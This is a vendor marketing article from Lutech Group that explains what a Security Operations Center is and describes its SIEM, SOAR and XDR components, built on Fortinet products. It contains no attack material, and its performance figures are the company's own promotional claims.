What is an SOC (Security Operations Center) and why companies really need one

Our Next-Generation SOC has been active for over fifteen years, managing IT security for more than a thousand corporate and public clients, handling over 30,000 security tickets for more than 3,000 devices managed in total.

Find out more

Understanding what an SOC (Security Operations Center) is simple; understanding how it works, what services it provides and why it is becoming more and more strategically important for companies requires some additional information.

We should immediately clarify that SOC can also mean a Service Operations Center, where all company application services are managed. But we are going to talk about SOC meaning Security Operations Center. On the other hand, security management services are a significant part of the services supplied by a Service Operation Center.

Lutech Group’s NG-SOC, Next-Generation Security Operations Center, is one of the largest and most complete in Italy. It is an operations center in which a team of over 30 certified and specialized technicians supplies and manages a wide catalogue of modular and flexible 24/7 services, based on recognized standard processes and international best practices. Of these, the security services are undoubtedly the most significant.

An SOC is a control center from which a company’s IT infrastructure is managed and monitored. Initially, SOCs were created in enterprises, which incorporated them in their data centers.

Along with the diffusion of as-a-service for applications, the development of the cloud has led to the transposition of the same model onto physical environments. The cloud was initially public and offered by hyperscalers or private companies to extend the model to on-premises structures, before becoming a combination of multiple environments (hybrid and multicloud), in a word: distributed.

The distributed IT structure and the increase of corporate workloads performed outside the company perimeter required a new protection model for heterogeneous environments, which could only be provided through a unified control center. Moreover, making use of an SOC “on top” of the distributed infrastructure allows smaller companies to use enterprise-class protection as well, thanks to clients being able to pay a fixed fee calculated on the basis of their architecture and business goals.

The security management and monitoring resources are thus “democratically” made available to all companies, regardless of their size and budget. It is precisely the economies of scale and undoubted cost savings, when considering the TCO and ROI of creating an internal center, which naturally drive the market towards the choice of an external SOC managed by an IT partner.

An SOC contains complementary application services and security platforms designed to:

• Provide a standard of proactive protection
• Offer 24/7 monitoring of the infrastructure
• React immediately to alerts and incidents
• Re-establish operation of the infrastructure after a blockage
• Adapt data and applications to compliance requirements
• Provide security services which are always up to date

Following in-depth preliminary analysis of the client infrastructure, the workloads, the access nodes of the company network and, above all, of the security priorities for data and applications on the basis of the business requirements, the IT partner and the client company are ready to draft a customized service contract with precise SLAs (Service Level Agreements).

We should also point out that the choice of an SOC requires a certain amount of care. It is essential to have guarantees on the expertise, certifications, structure, offering and references of the IT partner, because the client is entrusting the security of its business to an outside entity.

Lutech Group uses various Fortinet solutions in its SOC in Cinisello Balsamo, near Milan. This is because it is not advisable to rely on a single, all-encompassing platform for security management. In order to guarantee the highest levels of quality to its clients, Lutech Group has identified a wide portfolio of integratable best-in-class application services, in which each individual component is responsible for a specific task.

Inside a Security Operations Center, there are three essential service components: SIEM, SOAR and XDR, each with a specific purpose. SOCs do not only contain SIEM, SOAR and XDR services, but without the availability of these we really cannot consider it to be an SOC.

SIEM (Security Information & Event Management), supplied through Fortinet’s FortiSIEM solution, is the management tool for the security events recorded in the logs of the individual IT assets, including IoT devices and equipment. An SIEM platform provides useful support to the technicians of a security operations center. As a matter of fact, the number of alerts generated by the activities of the IT infrastructure is very high, and it is not possible to imagine managing them without an application which collects and aggregates them to identify and analyze them.

FortiSIEM also generates an automatic response or fix, acting as a complete security solution. FortiSIEM is also integratable and scalable, in other words FortiSIEM’s activities can be dynamically extended following an increase in workloads or equipment and devices thanks to a virtual machine-based architecture.

The unified FortiSIEM platform also reduces complexity thanks to multi-tenancy – a single instance which can be used independently by multiple applications – and multi-vendor support, which guarantees maximum interaction with the platforms used by the client. Finally, with FortiSIEM Lutech Group makes use of all the advantages of a single centralized console and a rapid detection system, ensuring a very fast ROI for its clients.

While an SIEM solution is the foundation of an SOC service, it is not sufficient to guarantee complete protection. This is, in part, because an SIEM solution requires regular tweaking of settings and fine tuning.

Integrated in the Fortinet Security Fabric platform, FortiSOAR offers innovative orchestration, management and automation of security events. Once again, this is a tool designed to simplify the lives of specialists, helping unify operations and reduce management times for the alerts, dynamic context changes and the average time required to respond to incidents. In particular, FortiSOAR offers response times up to 98% faster than manual operations.

Another advantage of a SOAR solution is also that it aggregates alerts from different IT assets and isolates them. In so doing, and thanks also to the available “playbooks”, Lutech Group’s security specialists have all the time necessary to analyze and act on the alerts through a unified view and automated process.

The last part of an SOC’s basic toolkit is a multi-level detection and response tool. FortiXDR is an extension of the concept of an EDR – endpoint detection and response tool – to the client’s entire IT infrastructure.

It is an additional tool which provides a further level of control in addition to that provided by SIEM and SOAR. In this case, it works on automatic correlation of multiple security levels (endpoints, email, servers, cloud and network workloads), in other words identifying a potential risk which could go unnoticed since it occurs only in correlation with an event related to another application silo.

Ultimately, the management and monitoring services for application and infrastructure activities provided by an SOC require a set of specific solutions to interpret and aggregate the information from the logs of the various IT assets. These solutions are created with the goal of simplifying the security work of the IT partner and, thanks to machine learning and automation algorithms, and preset management models, they are able to provide timely and consistent responses to the security issues emerging from the different logs generated by the components of the IT infrastructure.